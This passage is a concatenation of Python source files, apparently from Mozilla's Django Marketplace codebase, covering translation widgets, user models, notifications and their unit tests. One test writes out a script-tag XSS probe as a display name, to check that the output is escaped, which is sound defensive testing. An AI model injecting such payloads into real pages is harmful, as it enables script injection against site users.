id=500, locale='en-us', localized_string='test_name')
}
data = {'some_field': 'some_val',
'name': {'init': '', 'en-us': 'test_name'}}
# No change.
eq_(transfield_changed('name', initial, data), 0)
# Changed localization.
data['name']['en-us'] = 'test_name_changed'
eq_(transfield_changed('name', initial, data), 1)
# New localization.
data['name']['en-us'] = 'test_name'
data['name']['en-af'] = Translation.objects.create(
id=505, locale='en-af', localized_string='test_name_localized')
eq_(transfield_changed('name', initial, data), 1)
# Deleted localization.
del initial['name_en-us']
eq_(transfield_changed('name', initial, data), 1)
########NEW FILE########
__FILENAME__ = test_widgets
from pyquery import PyQuery as pq
from nose.tools import eq_
import amo.tests
from translations import models, widgets
class TestWidget(amo.tests.TestCase):
def test_avoid_purified_translation(self):
# Even if we pass in a LinkifiedTranslation the widget switches to a
# normal Translation before rendering.
w = widgets.TransTextarea.widget()
link = models.LinkifiedTranslation(localized_string='<b>yum yum</b>',
locale='fr', id=10)
link.clean()
widget = w.render('name', link)
eq_(pq(widget).html().strip(), '<b>yum yum</b>')
def test_default_locale(self):
w = widgets.TransTextarea()
result = w.render('name', '')
eq_(pq(result)('textarea:not([lang=init])').attr('lang'), 'en-us')
w.default_locale = 'pl'
result = w.render('name', '')
eq_(pq(result)('textarea:not([lang=init])').attr('lang'), 'pl')
########NEW FILE########
__FILENAME__ = transformer
from django.conf import settings
from django.db import connections, models, router
from django.utils import translation
from translations.models import Translation
from translations.fields import TranslatedField
isnull = """IF(!ISNULL({t1}.localized_string), {t1}.{col}, {t2}.{col})
AS {name}_{col}"""
join = """LEFT OUTER JOIN translations {t}
ON ({t}.id={model}.{name} AND {t}.locale={locale})"""
no_locale_join = """LEFT OUTER JOIN translations {t}
ON {t}.id={model}.{name}"""
trans_fields = [f.name for f in Translation._meta.fields]
def build_query(model, connection):
qn = connection.ops.quote_name
selects, joins, params = [], [], []
# The model can define a fallback locale (which may be a Field).
if hasattr(model, 'get_fallback'):
fallback = model.get_fallback()
else:
fallback = settings.LANGUAGE_CODE
if not hasattr(model._meta, 'translated_fields'):
model._meta.translated_fields = [f for f in model._meta.fields
if isinstance(f, TranslatedField)]
# Add the selects and joins for each translated field on the model.
for field in model._meta.translated_fields:
if isinstance(fallback, models.Field):
fallback_str = '%s.%s' % (qn(model._meta.db_table),
qn(fallback.column))
else:
fallback_str = '%s'
name = field.column
d = {'t1': 't1_' + name, 't2': 't2_' + name,
'model': qn(model._meta.db_table), 'name': name}
selects.extend(isnull.format(col=f, **d) for f in trans_fields)
joins.append(join.format(t=d['t1'], locale='%s', **d))
params.append(translation.get_language())
if field.require_locale:
joins.append(join.format(t=d['t2'], locale=fallback_str, **d))
if not isinstance(fallback, models.Field):
params.append(fallback)
else:
joins.append(no_locale_join.format(t=d['t2'], **d))
# ids will be added later on.
sql = """SELECT {model}.{pk}, {selects} FROM {model} {joins}
WHERE {model}.{pk} IN {{ids}}"""
s = sql.format(selects=','.join(selects), joins='\n'.join(joins),
model=qn(model._meta.db_table), pk=model._meta.pk.column)
return s, params
def get_trans(items):
if not items:
return
model = items[0].__class__
# FIXME: if we knew which db the queryset we are transforming used, we could
# make sure we are re-using the same one.
dbname = router.db_for_read(model)
connection = connections[dbname]
sql, params = build_query(model, connection)
item_dict = dict((item.pk, item) for item in items)
ids = ','.join(map(str, item_dict.keys()))
cursor = connection.cursor()
cursor.execute(sql.format(ids='(%s)' % ids), tuple(params))
step = len(trans_fields)
for row in cursor.fetchall():
# We put the item's pk as the first selected field.
item = item_dict[row[0]]
for index, field in enumerate(model._meta.translated_fields):
start = 1 + step * index
t = Translation(*row[start:start+step])
if t.id is not None and t.localized_string is not None:
setattr(item, field.name, t)
########NEW FILE########
__FILENAME__ = utils
import copy
from django.utils.encoding import force_unicode
import html5lib
import jinja2
def truncate_text(text, limit, killwords=False, end='...'):
"""Return as many characters as possible without going over the limit.
Return the truncated text and the characters left before the limit, if any.
"""
text = text.strip()
text_length = len(text)
if text_length < limit:
return text, limit - text_length
# Explicitly add "end" in any case, as Jinja can't know we're truncating
# for real here, even though we might be at the end of a word.
text = jinja2.filters.do_truncate(text, limit, killwords, end='')
return text + end, 0
def trim(tree, limit, killwords, end):
"""Truncate the text of an html5lib tree."""
if tree.text: # Root node's text.
tree.text, limit = truncate_text(tree.text, limit, killwords, end)
for child in tree: # Immediate children.
if limit <= 0:
# We reached the limit, remove all remaining children.
tree.remove(child)
else:
# Recurse on the current child.
_parsed_tree, limit = trim(child, limit, killwords, end)
if tree.tail: # Root node's tail text.
if limit <= 0:
tree.tail = ''
else:
tree.tail, limit = truncate_text(tree.tail, limit, killwords, end)
return tree, limit
def text_length(tree):
"""Find the length of the text content, excluding markup."""
total = 0
for node in tree.getiterator(): # Traverse all the tree nodes.
# In etree, a node has a text and tail attribute.
# Eg: "<b>inner text</b> tail text <em>inner text</em>".
if node.text:
total += len(node.text.strip())
if node.tail:
total += len(node.tail.strip())
return total
def truncate(html, length, killwords=False, end='...'):
"""
Return a slice of ``html`` <= length chars.
killwords and end are currently ignored.
ONLY USE FOR KNOWN-SAFE HTML.
"""
tree = html5lib.parseFragment(html)
if text_length(tree) <= length:
return jinja2.Markup(html)
else:
# Get a truncated version of the tree.
short, _ = trim(tree, length, killwords, end)
# Serialize the parsed tree back to html.
walker = html5lib.treewalkers.getTreeWalker('etree')
stream = walker(short)
serializer = html5lib.serializer.htmlserializer.HTMLSerializer(
quote_attr_values=True, omit_optional_tags=False)
return jinja2.Markup(force_unicode(serializer.render(stream)))
def transfield_changed(field, initial, data):
"""
For forms, compares initial data against cleaned_data for TransFields.
Returns True if data is the same. Returns False if data is different.
Arguments:
field -- name of the form field as-is.
initial -- data in the form of {'description_en-us': 'x',
'description_en-br': 'y'}
data -- cleaned data in the form of {'description': {'init': '',
'en-us': 'x',
'en-br': 'y'}
"""
initial = [(k, v.localized_string) for k, v in initial.iteritems()
if '%s_' % field in k and v != None]
data = [('%s_%s' % (field, k), v) for k, v in data[field].iteritems()
if k != 'init']
return set(initial) != set(data)
########NEW FILE########
__FILENAME__ = widgets
from django import forms
from django.utils import translation
from django.utils.encoding import force_text
from django.utils.translation.trans_real import to_language
from .models import Translation
def get_string(x):
locale = translation.get_language()
try:
return (Translation.objects.filter(id=x, locale=locale)
.filter(localized_string__isnull=False)
.values_list('localized_string', flat=True)[0])
except IndexError:
return u''
class TranslationTextInput(forms.widgets.TextInput):
"""A simple textfield replacement for collecting translated names."""
def _format_value(self, value):
if isinstance(value, long):
return get_string(value)
return value
class TranslationTextarea(forms.widgets.Textarea):
def render(self, name, value, attrs=None):
if isinstance(value, long):
value = get_string(value)
return super(TranslationTextarea, self).render(name, value, attrs)
def _has_changed(self, initial, data):
return not ((initial is None and data is None) or
(force_text(initial) == force_text(data)))
class TransMulti(forms.widgets.MultiWidget):
"""
Builds the inputs for a translatable field.
The backend dumps all the available translations into a set of widgets
wrapped in div.trans and javascript handles the rest of the UI.
"""
choices = None # Django expects widgets to have a choices attribute.
def __init__(self, attrs=None):
# We set up the widgets in render since every Translation needs a
# different number of widgets.
super(TransMulti, self).__init__(widgets=[], attrs=attrs)
def render(self, name, value, attrs=None):
self.name = name
value = self.decompress(value)
if value:
self.widgets = [self.widget() for _ in value]
else:
# Give an empty widget in the default locale.
default_locale = getattr(self, 'default_locale',
translation.get_language())
self.widgets = [self.widget()]
value = [Translation(locale=default_locale)]
return super(TransMulti, self).render(name, value, attrs)
def decompress(self, value):
if not value:
return []
elif isinstance(value, (long, int)):
# We got a foreign key to the translation table.
qs = Translation.objects.filter(id=value)
return list(qs.filter(localized_string__isnull=False))
elif isinstance(value, dict):
# We're getting a datadict, there was a validation error.
return [Translation(locale=k, localized_string=v)
for k, v in value.items()]
def value_from_datadict(self, data, files, name):
# All the translations for this field are called {name}_{locale}, so
# pull out everything that starts with name.
rv = {}
prefix = '%s_' % name
locale = lambda s: s[len(prefix):]
delete_locale = lambda s: s[len(prefix):-len('_delete')]
# Look for the name without a locale suffix.
if name in data:
rv[translation.get_language()] = data[name]
# Now look for {name}_{locale}.
for key in data:
if key.startswith(prefix):
if key.endswith('_delete'):
rv[delete_locale(key)] = None
else:
rv[locale(key)] = data[key]
return rv
def format_output(self, widgets):
s = super(TransMulti, self).format_output(widgets)
init = self.widget().render(self.name + '_',
Translation(locale='init'),
{'class': 'trans-init'})
return '<div id="trans-%s" class="trans" data-name="%s">%s%s</div>' % (
self.name, self.name, s, init)
class _TransWidget(object):
"""
Widget mixin that adds a Translation locale to the lang attribute and the
input name.
"""
def render(self, name, value, attrs=None):
from .fields import switch
attrs = self.build_attrs(attrs)
lang = to_language(value.locale)
attrs.update(lang=lang)
# Use rsplit to drop django's name_idx numbering. (name_0 => name)
name = '%s_%s' % (name.rsplit('_', 1)[0], lang)
# Make sure we don't get a Linkified/Purified Translation. We don't
# want people editing a bleached value.
if value.__class__ != Translation:
value = switch(value, Translation)
return super(_TransWidget, self).render(name, value, attrs)
# TransInput and TransTextarea are MultiWidgets that know how to set up our
# special translation attributes.
class TransInput(TransMulti):
widget = type('_TextInput', (_TransWidget, forms.widgets.TextInput), {})
class TransTextarea(TransMulti):
widget = type('_Textarea', (_TransWidget, forms.widgets.Textarea), {})
########NEW FILE########
__FILENAME__ = cron
from django.db import connections
import commonware.log
import cronjobs
import multidb
from celery.task.sets import TaskSet
from amo import VALID_STATUSES
from amo.utils import chunked
from .tasks import update_user_ratings_task
task_log = commonware.log.getLogger('z.task')
@cronjobs.register
def update_user_ratings():
"""Update add-on author's ratings."""
cursor = connections[multidb.get_slave()].cursor()
# We build this query ahead of time because the cursor complains about data
# truncation if it does the parameters. Also, this query is surprisingly
# quick, <1sec for 6100 rows returned
q = """ SELECT
addons_users.user_id as user_id,
AVG(rating) as avg_rating
FROM reviews
INNER JOIN versions
INNER JOIN addons_users
INNER JOIN addons
ON reviews.version_id = versions.id
AND addons.id = versions.addon_id
AND addons_users.addon_id = addons.id
WHERE reviews.reply_to IS NULL
AND reviews.rating > 0
AND addons.status IN (%s)
GROUP BY addons_users.user_id
""" % (",".join(map(str, VALID_STATUSES)))
cursor.execute(q)
d = cursor.fetchall()
cursor.close()
ts = [update_user_ratings_task.subtask(args=[chunk])
for chunk in chunked(d, 1000)]
TaskSet(ts).apply_async()
########NEW FILE########
__FILENAME__ = helpers
import random
from django.utils.encoding import smart_unicode
import jinja2
from jingo import register
from tower import ugettext as _
@register.function
def emaillink(email, title=None, klass=None):
if not email:
return ""
fallback = email[::-1] # reverse
# inject junk somewhere
i = random.randint(0, len(email) - 1)
fallback = u"%s%s%s" % (jinja2.escape(fallback[:i]),
u'<span class="i">null</span>',
jinja2.escape(fallback[i:]))
# replace @ and .
fallback = fallback.replace('@', '@').replace('.', '.')
if title:
title = jinja2.escape(title)
else:
title = '<span class="emaillink">%s</span>' % fallback
node = (u'<a%s href="#">%s</a><span class="emaillink js-hidden">%s</span>'
% ((' class="%s"' % klass) if klass else '', title, fallback))
return jinja2.Markup(node)
def _user_link(user):
if isinstance(user, basestring):
return user
# Marketplace doesn't have user profile pages.
return jinja2.escape(smart_unicode(user.name))
@register.filter
def user_link(user):
if not user:
return ''
return jinja2.Markup(_user_link(user))
@register.function
def users_list(users, size=None):
if not users:
return ''
tail = []
if size and size < len(users):
users = users[:size]
tail = [_('others', 'user_list_others')]
return jinja2.Markup(', '.join(map(_user_link, users) + tail))
@register.function
def user_data(amo_user):
anonymous, currency, pre_auth, email = True, 'USD', False, ''
if hasattr(amo_user, 'is_anonymous'):
anonymous = amo_user.is_anonymous()
if not anonymous:
email = amo_user.email
return {'anonymous': anonymous, 'currency': currency, 'email': email}
########NEW FILE########
__FILENAME__ = models
import re
import time
from contextlib import contextmanager
from datetime import datetime
from django import forms
from django.conf import settings
from django.contrib.auth.models import AbstractBaseUser
from django.core import validators
from django.db import models
from django.utils import translation
from django.utils.encoding import smart_unicode
from django.utils.functional import lazy
import commonware.log
import tower
from cache_nuggets.lib import memoize
from tower import ugettext as _
import amo
import amo.models
from amo.urlresolvers import reverse
from translations.fields import NoLinksField, save_signal
from translations.query import order_by_translation
log = commonware.log.getLogger('z.users')
class UserForeignKey(models.ForeignKey):
"""
A replacement for models.ForeignKey('users.UserProfile').
This field uses UserEmailField to make form fields key off the user's email
instead of the primary key id. We also hook up autocomplete automatically.
"""
def __init__(self, *args, **kw):
super(UserForeignKey, self).__init__(UserProfile, *args, **kw)
def value_from_object(self, obj):
return getattr(obj, self.name).email
def formfield(self, **kw):
defaults = {'form_class': UserEmailField}
defaults.update(kw)
return models.Field.formfield(self, **defaults)
class UserEmailField(forms.EmailField):
def clean(self, value):
if value in validators.EMPTY_VALUES:
raise forms.ValidationError(self.error_messages['required'])
try:
return UserProfile.objects.get(email=value)
except UserProfile.DoesNotExist:
raise forms.ValidationError(_('No user with that email.'))
def widget_attrs(self, widget):
lazy_reverse = lazy(reverse, str)
return {'class': 'email-autocomplete',
'data-src': lazy_reverse('users.ajax')}
AbstractBaseUser._meta.get_field('password').max_length = 255
class UserProfile(amo.models.OnChangeMixin, amo.models.ModelBase,
AbstractBaseUser):
USERNAME_FIELD = 'username'
username = models.CharField(max_length=255, default='', unique=True)
display_name = models.CharField(max_length=255, default='', null=True,
blank=True)
email = models.EmailField(unique=True, null=True)
averagerating = models.CharField(max_length=255, blank=True, null=True)
bio = NoLinksField(short=False)
confirmationcode = models.CharField(max_length=255, default='',
blank=True)
deleted = models.BooleanField(default=False)
display_collections = models.BooleanField(default=False)
display_collections_fav = models.BooleanField(default=False)
emailhidden = models.BooleanField(default=True)
homepage = models.URLField(max_length=255, blank=True, default='')
location = models.CharField(max_length=255, blank=True, default='')
notes = models.TextField(blank=True, null=True)
notifycompat = models.BooleanField(default=True)
notifyevents = models.BooleanField(default=True)
occupation = models.CharField(max_length=255, default='', blank=True)
# This is essentially a "has_picture" flag right now
picture_type = models.CharField(max_length=75, default='', blank=True)
resetcode = models.CharField(max_length=255, default='', blank=True)
resetcode_expires = models.DateTimeField(default=datetime.now, null=True,
blank=True)
read_dev_agreement = models.DateTimeField(null=True, blank=True)
last_login_ip = models.CharField(default='', max_length=45, editable=False)
last_login_attempt = models.DateTimeField(null=True, editable=False)
last_login_attempt_ip = models.CharField(default='', max_length=45,
editable=False)
failed_login_attempts = models.PositiveIntegerField(default=0,
editable=False)
source = models.PositiveIntegerField(default=amo.LOGIN_SOURCE_UNKNOWN,
editable=False, db_index=True)
is_verified = models.BooleanField(default=True)
region = models.CharField(max_length=11, null=True, blank=True,
editable=False)
lang = models.CharField(max_length=5, null=True, blank=True,
editable=False)
class Meta:
db_table = 'users'
def __init__(self, *args, **kw):
super(UserProfile, self).__init__(*args, **kw)
if self.username:
self.username = smart_unicode(self.username)
def __unicode__(self):
return u'%s: %s' % (self.id, self.display_name or self.username)
def save(self, force_insert=False, force_update=False, using=None, **kwargs):
# we have to fix stupid things that we defined poorly in remora
if not self.resetcode_expires:
self.resetcode_expires = datetime.now()
super(UserProfile, self).save(force_insert, force_update, using,
**kwargs)
@property
def is_superuser(self):
return self.groups.filter(rules='*:*').exists()
@property
def is_staff(self):
from access import acl
return acl.action_allowed_user(self, 'Admin', '%')
def has_perm(self, perm, obj=None):
return self.is_superuser
def has_module_perms(self, app_label):
return self.is_superuser
def get_backend(self):
return 'django_browserid.auth.BrowserIDBackend'
def set_backend(self, val):
pass
backend = property(get_backend, set_backend)
def is_anonymous(self):
return False
def get_url_path(self, src=None):
# See: bug 880767.
return '#'
def my_apps(self, n=8):
"""Returns n apps"""
qs = self.addons.filter(type=amo.ADDON_WEBAPP)
qs = order_by_translation(qs, 'name')
return qs[:n]
@property
def picture_url(self):
if not self.picture_type:
return settings.MEDIA_URL + '/img/zamboni/anon_user.png'
else:
split_id = re.match(r'((\d*?)(\d{0,3}?))\d{1,3}$', str(self.id))
return settings.USERPICS_URL % (
split_id.group(2) or 0, split_id.group(1) or 0, self.id,
int(time.mktime(self.modified.timetuple())))
@amo.cached_property
def is_developer(self):
return self.addonuser_set.exists()
@property
def name(self):
return smart_unicode(self.display_name or self.username)
@amo.cached_property
def reviews(self):
"""All reviews that are not dev replies."""
qs = self._reviews_all.filter(reply_to=None)
# Force the query to occur immediately. Several
# reviews-related tests hang if this isn't done.
return qs
def anonymize(self):
log.info(u"User (%s: <%s>) is being anonymized." % (self, self.email))
self.email = None
self.password = "sha512$Anonymous$Password"
self.username = "Anonymous-%s" % self.id # Can't be null
self.display_name = None
self.homepage = ""
self.deleted = True
self.picture_type = ""
self.save()
def check_password(self, raw_password):
# BrowserID does not store a password.
return True
def log_login_attempt(self, successful):
"""Log a user's login attempt"""
self.last_login_attempt = datetime.now()
self.last_login_attempt_ip = commonware.log.get_remote_addr()
if successful:
log.debug(u"User (%s) logged in successfully" % self)
self.failed_login_attempts = 0
self.last_login_ip = commonware.log.get_remote_addr()
else:
log.debug(u"User (%s) failed to log in" % self)
if self.failed_login_attempts < 16777216:
self.failed_login_attempts += 1
self.save()
def purchase_ids(self):
"""
I'm special casing this because we use purchase_ids a lot in the site
and we are not caching empty querysets in cache-machine.
That means that when the site is first launched we are having a
lot of empty queries hit.
We can probably do this in smarter fashion by making cache-machine
cache empty queries on an as need basis.
"""
# Circular import
from mkt.prices.models import AddonPurchase
@memoize(prefix='users:purchase-ids')
def ids(pk):
return (AddonPurchase.objects.filter(user=pk)
.values_list('addon_id', flat=True)
.filter(type=amo.CONTRIB_PURCHASE)
.order_by('pk'))
return ids(self.pk)
@contextmanager
def activate_lang(self):
"""
Activate the language for the user. If none is set will go to the site
default which is en-US.
"""
lang = self.lang if self.lang else settings.LANGUAGE_CODE
old = translation.get_language()
tower.activate(lang)
yield
tower.activate(old)
models.signals.pre_save.connect(save_signal, sender=UserProfile,
dispatch_uid='userprofile_translations')
class UserNotification(amo.models.ModelBase):
user = models.ForeignKey(UserProfile, related_name='notifications')
notification_id = models.IntegerField()
enabled = models.BooleanField(default=False)
class Meta:
db_table = 'users_notifications'
@staticmethod
def update_or_create(update={}, **kwargs):
rows = UserNotification.objects.filter(**kwargs).update(**update)
if not rows:
update.update(dict(**kwargs))
UserNotification.objects.create(**update)
########NEW FILE########
__FILENAME__ = notifications
from inspect import isclass
from celery.datastructures import AttributeDict
from tower import ugettext_lazy as _
class _NOTIFICATION(object):
pass
class thanks(_NOTIFICATION):
id = 2
group = 'user'
short = 'dev_thanks'
label = _('an add-on developer thanks me for a contribution')
mandatory = False
default_checked = True
class reply(_NOTIFICATION):
id = 3
group = 'user'
short = 'reply'
label = _('an add-on developer replies to my review')
mandatory = False
default_checked = True
class app_reply(reply):
app = True
short = 'app_reply'
label = _('an app developer replies to my review')
class new_features(_NOTIFICATION):
id = 4
group = 'user'
short = 'new_features'
label = _('new add-ons or Firefox features are available')
mandatory = False
default_checked = True
class upgrade_success(_NOTIFICATION):
id = 5
group = 'dev'
short = 'upgrade_success'
label = _("my add-on's compatibility is upgraded successfully")
mandatory = False
default_checked = True
class sdk_upgrade_success(_NOTIFICATION):
id = 6
group = 'dev'
short = 'sdk_upgrade_success'
label = _("my sdk-based add-on is upgraded successfully")
mandatory = False
default_checked = True
class new_review(_NOTIFICATION):
id = 7
group = 'dev'
short = 'new_review'
label = _("someone writes a review of my add-on")
mandatory = False
default_checked = True
class app_new_review(new_review):
app = True
short = 'app_new_review'
label = _('someone writes a review of my app')
class announcements(_NOTIFICATION):
id = 8
group = 'dev'
short = 'announcements'
label = _("add-on contests or events are announced")
mandatory = False
default_checked = True
class upgrade_fail(_NOTIFICATION):
id = 9
group = 'dev'
short = 'upgrade_fail'
label = _("my add-on's compatibility cannot be upgraded")
mandatory = True
default_checked = True
class sdk_upgrade_fail(_NOTIFICATION):
id = 10
group = 'dev'
short = 'sdk_upgrade_fail'
label = _("my sdk-based add-on cannot be upgraded")
mandatory = True
default_checked = True
class editor_reviewed(_NOTIFICATION):
id = 11
group = 'dev'
short = 'editor_reviewed'
label = _("my add-on is reviewed by an editor")
mandatory = True
default_checked = True
class individual_contact(_NOTIFICATION):
id = 12
group = 'dev'
short = 'individual_contact'
label = _("Mozilla needs to contact me about my individual add-on")
mandatory = True
default_checked = True
class app_reviewed(editor_reviewed):
app = True
# Note: This is super ambiguous language if we say "reviewer."
short = 'app_reviewed'
label = _('my app is reviewed by an editor')
class app_individual_contact(individual_contact):
app = True
short = 'app_individual_contact'
label = _('Mozilla needs to contact me about my individual app')
class app_surveys(_NOTIFICATION):
id = 13
group = 'dev'
short = 'app_surveys'
label = _('Mozilla wants to contact me about relevant App Developer news '
'and surveys')
mandatory = False
default_checked = False
app = True
class app_regions(_NOTIFICATION):
id = 14
group = 'dev'
short = 'app_regions'
label = _('Mozilla wants to contact me about new regions added to the '
'Marketplace')
mandatory = False
default_checked = True
app = True
NOTIFICATION_GROUPS = {'dev': _('Developer'),
'user': _('User Notifications')}
APP_NOTIFICATIONS = [app_reply, app_new_review, app_reviewed,
app_individual_contact, app_surveys, app_regions]
APP_NOTIFICATIONS_BY_ID = dict((l.id, l) for l in APP_NOTIFICATIONS)
APP_NOTIFICATIONS_DEFAULT = [l.id for l in APP_NOTIFICATIONS]
APP_NOTIFICATIONS_CHOICES = [(l.id, l.label) for l in APP_NOTIFICATIONS]
APP_NOTIFICATIONS_CHOICES_NOT_DEV = [(l.id, l.label) for l in APP_NOTIFICATIONS
if l.group != 'dev']
NOTIFICATIONS = [x for x in vars().values()
if isclass(x) and issubclass(x, _NOTIFICATION)
and x != _NOTIFICATION and not getattr(x, 'app', False)]
NOTIFICATIONS_BY_ID = dict((l.id, l) for l in NOTIFICATIONS)
ALL_NOTIFICATIONS_BY_ID = dict((l.id, l) for l in
NOTIFICATIONS + APP_NOTIFICATIONS)
NOTIFICATIONS_BY_SHORT = dict((l.short, l) for l in
NOTIFICATIONS + APP_NOTIFICATIONS)
NOTIFICATION = AttributeDict((l.__name__, l) for l in NOTIFICATIONS)
NOTIFICATIONS_DEFAULT = [l.id for l in NOTIFICATIONS if l.default_checked]
NOTIFICATIONS_CHOICES = [(l.id, l.label) for l in NOTIFICATIONS]
NOTIFICATIONS_CHOICES_NOT_DEV = [(l.id, l.label) for l in NOTIFICATIONS
if l.group != 'dev']
########NEW FILE########
__FILENAME__ = signals
from django.dispatch import Signal
logged_out = Signal(providing_args=['request', 'response'])
########NEW FILE########
__FILENAME__ = tasks
import commonware.log
from celeryutils import task
from .models import UserProfile
task_log = commonware.log.getLogger('z.task')
@task(rate_limit='15/m')
def update_user_ratings_task(data, **kw):
task_log.info("[%s@%s] Updating add-on author's ratings." %
(len(data), update_user_ratings_task.rate_limit))
for pk, rating in data:
rating = "%.2f" % round(rating, 2)
UserProfile.objects.filter(pk=pk).update(averagerating=rating)
########NEW FILE########
__FILENAME__ = test_helpers
# -*- coding: utf-8 -*-
import re
from nose.tools import eq_
from users.helpers import emaillink, user_data, user_link, users_list
from users.models import UserProfile
def test_emaillink():
email = '[email protected]'
obfuscated = unicode(emaillink(email))
# remove junk
m = re.match(r'<a href="#"><span class="emaillink">(.*?)'
'<span class="i">null</span>(.*)</span></a>'
'<span class="emaillink js-hidden">(.*?)'
'<span class="i">null</span>(.*)</span>', obfuscated)
obfuscated = (''.join((m.group(1), m.group(2)))
.replace('@', '@').replace('.', '.'))[::-1]
eq_(email, obfuscated)
title = 'E-mail your question'
obfuscated = unicode(emaillink(email, title))
m = re.match(r'<a href="#">(.*)</a>'
'<span class="emaillink js-hidden">(.*?)'
'<span class="i">null</span>(.*)</span>', obfuscated)
eq_(title, m.group(1))
obfuscated = (''.join((m.group(2), m.group(3)))
.replace('@', '@').replace('.', '.'))[::-1]
eq_(email, obfuscated)
def test_user_link():
u = UserProfile(username='jconnor', display_name='John Connor', pk=1)
eq_(user_link(u), '<a href="%s">John Connor</a>' % u.get_url_path())
# handle None gracefully
eq_(user_link(None), '')
def test_user_link_xss():
u = UserProfile(username='jconnor',
display_name='<script>alert(1)</script>', pk=1)
html = "<script>alert(1)</script>"
eq_(user_link(u), '<a href="%s">%s</a>' % (u.get_url_path(), html))
def test_users_list():
u1 = UserProfile(username='jconnor', display_name='John Connor', pk=1)
u2 = UserProfile(username='sconnor', display_name='Sarah Connor', pk=2)
eq_(users_list([u1, u2]), ', '.join((user_link(u1), user_link(u2))))
# handle None gracefully
eq_(user_link(None), '')
def test_short_users_list():
"""Test the option to shortened the users list to a certain size."""
# short list with 'others'
u1 = UserProfile(username='oscar', display_name='Oscar the Grouch', pk=1)
u2 = UserProfile(username='grover', display_name='Grover', pk=2)
u3 = UserProfile(username='cookies!', display_name='Cookie Monster', pk=3)
shortlist = users_list([u1, u2, u3], size=2)
eq_(shortlist, ', '.join((user_link(u1), user_link(u2))) + ', others')
def test_user_link_unicode():
"""make sure helper won't choke on unicode input"""
u = UserProfile(username=u'jmüller', display_name=u'Jürgen Müller', pk=1)
eq_(user_link(u), u'<a href="%s">Jürgen Müller</a>' % u.get_url_path())
u = UserProfile(username='\xe5\xaf\x92\xe6\x98\x9f', pk=1)
eq_(user_link(u),
u'<a href="%s">%s</a>' % (u.get_url_path(), u.username))
def test_user_data():
u = user_data(UserProfile(username='foo', pk=1))
eq_(u['anonymous'], False)
########NEW FILE########
__FILENAME__ = test_models
# -*- coding: utf-8 -*-
import datetime
from django import forms
from django.conf import settings
from django.utils import translation
from mock import patch
from nose.tools import eq_
import amo
import amo.tests
from access.models import Group, GroupUser
from addons.models import Addon, AddonUser
from reviews.models import Review
from translations.models import Translation
from users.models import UserEmailField, UserProfile
class TestUserProfile(amo.tests.TestCase):
fixtures = ('base/addon_3615', 'base/user_2519', 'base/user_4043307',
'users/test_backends', 'base/apps',)
def test_anonymize(self):
u = UserProfile.objects.get(id='4043307')
eq_(u.email, '[email protected]')
u.anonymize()
x = UserProfile.objects.get(id='4043307')
eq_(x.email, None)
def test_add_admin_powers(self):
Group.objects.create(name='Admins', rules='*:*')
u = UserProfile.objects.get(username='jbalogh')
assert not u.is_staff
assert not u.is_superuser
GroupUser.objects.create(group=Group.objects.filter(name='Admins')[0],
user=u)
assert u.is_staff
assert u.is_superuser
def test_dont_add_admin_powers(self):
Group.objects.create(name='API', rules='API.Users:*')
u = UserProfile.objects.get(username='jbalogh')
GroupUser.objects.create(group=Group.objects.get(name='API'),
user=u)
assert not u.is_staff
assert not u.is_superuser
def test_remove_admin_powers(self):
Group.objects.create(name='Admins', rules='*:*')
u = UserProfile.objects.get(username='jbalogh')
g = GroupUser.objects.create(group=Group.objects.filter(name='Admins')[0],
user=u)
g.delete()
assert not u.is_staff
assert not u.is_superuser
def test_picture_url(self):
"""
Test for a preview URL if image is set, or default image otherwise.
"""
u = UserProfile(id=1234, picture_type='image/png',
modified=datetime.date.today())
u.picture_url.index('/userpics/0/1/1234.png?modified=')
u = UserProfile(id=1234567890, picture_type='image/png',
modified=datetime.date.today())
u.picture_url.index('/userpics/1234/1234567/1234567890.png?modified=')
u = UserProfile(id=1234, picture_type=None)
assert u.picture_url.endswith('/anon_user.png')
def test_review_replies(self):
"""
Make sure that developer replies are not returned as if they were
original reviews.
"""
addon = Addon.objects.get(id=3615)
u = UserProfile.objects.get(pk=2519)
version = addon.get_version()
new_review = Review(version=version, user=u, rating=2, body='hello',
addon=addon)
new_review.save()
new_reply = Review(version=version, user=u, reply_to=new_review,
addon=addon, body='my reply')
new_reply.save()
review_list = [r.pk for r in u.reviews]
eq_(len(review_list), 1)
assert new_review.pk in review_list, (
'Original review must show up in review list.')
assert new_reply.pk not in review_list, (
'Developer reply must not show up in review list.')
def test_my_apps(self):
"""Test helper method to get N apps."""
addon1 = Addon.objects.create(name='test-1', type=amo.ADDON_WEBAPP)
AddonUser.objects.create(addon_id=addon1.id, user_id=2519, listed=True)
addon2 = Addon.objects.create(name='test-2', type=amo.ADDON_WEBAPP)
AddonUser.objects.create(addon_id=addon2.id, user_id=2519, listed=True)
u = UserProfile.objects.get(id=2519)
addons = u.my_apps()
self.assertTrue(sorted([a.name for a in addons]) == [addon1.name,
addon2.name])
def test_get_url_path(self):
eq_(UserProfile(username='yolo').get_url_path(),
'/en-US/firefox/user/yolo/')
eq_(UserProfile(username='yolo', id=1).get_url_path(),
'/en-US/firefox/user/yolo/')
eq_(UserProfile(id=1).get_url_path(),
'/en-US/firefox/user/1/')
eq_(UserProfile(username='<yolo>', id=1).get_url_path(),
'/en-US/firefox/user/1/')
@patch.object(settings, 'LANGUAGE_CODE', 'en-US')
def test_activate_locale(self):
eq_(translation.get_language(), 'en-us')
with UserProfile(username='yolo').activate_lang():
eq_(translation.get_language(), 'en-us')
with UserProfile(username='yolo', lang='fr').activate_lang():
eq_(translation.get_language(), 'fr')
def test_remove_locale(self):
u = UserProfile.objects.create()
u.bio = {'en-US': 'my bio', 'fr': 'ma bio'}
u.save()
u.remove_locale('fr')
qs = (Translation.objects.filter(localized_string__isnull=False)
.values_list('locale', flat=True))
eq_(sorted(qs.filter(id=u.bio_id)), ['en-US'])
class TestUserEmailField(amo.tests.TestCase):
fixtures = ['base/user_2519']
def test_success(self):
user = UserProfile.objects.get(pk=2519)
eq_(UserEmailField().clean(user.email), user)
def test_failure(self):
with self.assertRaises(forms.ValidationError):
UserEmailField().clean('xxx')
def test_empty_email(self):
UserProfile.objects.create(email='')
with self.assertRaises(forms.ValidationError) as e:
UserEmailField().clean('')
eq_(e.exception.messages[0], 'This field is required.')
########NEW FILE########
__FILENAME__ = test_user_utils
import fudge
import mock
from nose.tools import eq_
from django.conf import settings
import amo.tests
from users.utils import autocreate_username
class TestAutoCreateUsername(amo.tests.TestCase):
def test_invalid_characters(self):
eq_(autocreate_username('testaccount+slug'), 'testaccountslug')
def test_empty_username_is_a_random_hash(self):
un = autocreate_username('.+') # this shouldn't happen but it could!
